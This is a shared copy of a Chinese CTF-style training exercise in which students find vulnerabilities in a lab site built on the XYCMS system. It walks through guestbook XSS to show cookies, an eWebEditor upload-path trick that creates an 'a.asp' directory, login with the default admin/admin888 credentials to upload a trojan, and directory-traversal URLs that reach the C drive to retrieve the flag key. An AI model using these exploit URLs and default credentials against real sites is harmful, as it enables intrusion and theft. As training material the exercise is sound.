题目21：网站漏洞攻击之xycms企业建站系统

《题目21：网站漏洞攻击之xycms企业建站系统》由会员上传分享，免费在线阅读，更多相关内容在教育资源-天天文库。

1、关卡二十一题目：网站漏洞攻击之XYCMS企业建站系统描述:公司搭建了门户网站，使用了XYCMS企业建站系统。但是经过一段时间的运营，发现公司网站经常受到黑客的攻击，给公司造成了很大的不便和损失。上级领导要求尽快查清原因，作为网络安全维护人员，请查找公司网站可能存在的一些漏洞至少两个。答案提交：1、请提交获取的key值。参考步骤：1．进入关卡二十一，点击查看IP地址获取靶机IP2.获得的靶机IP地址3.打开场景工具WindowXp4.进入xp渗透攻击机，打开浏览器浏览将要攻击的网站5.SQL注入使用“啊D注入工具”对网站进行漏洞测试继续对注入点进行SQL注入，但没有发现可利

2、用的信息，表明此处无漏洞。6.XSS漏洞利用(1)在留言本-留言标题中插入XSS脚本，(2)返回带有cookie的提示窗7.编辑器漏洞利用（1）利用编辑器漏洞进行在网站上生产a.asp目录http://172.16.1.62/admin/xyewebeditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp（2）编辑器管理界面的路径默认：http://172.16.1.62/admin/xyeWebE

3、ditor/admin/login.asp在浏览器中打开此地址（3）输入ewebeditor默认用户名admin密码admin888登录管理如下：然后就可以对样式进行管理上传自己制作的木马程序（4）编辑器默认目录遍历地址：http://192.168.1.62/admin/xyeWebEditor/admin/upload.asp?id=1&d_viewmode=list&dir=../并在浏览器中打开此地址（5）利用编辑器默认目录遍历漏洞http://192.168.1.62/admin/xyeWebEditor/admin/upload.asp?id=1&d_view

4、mode=list&dir=../../../访问到C盘根目录获取的key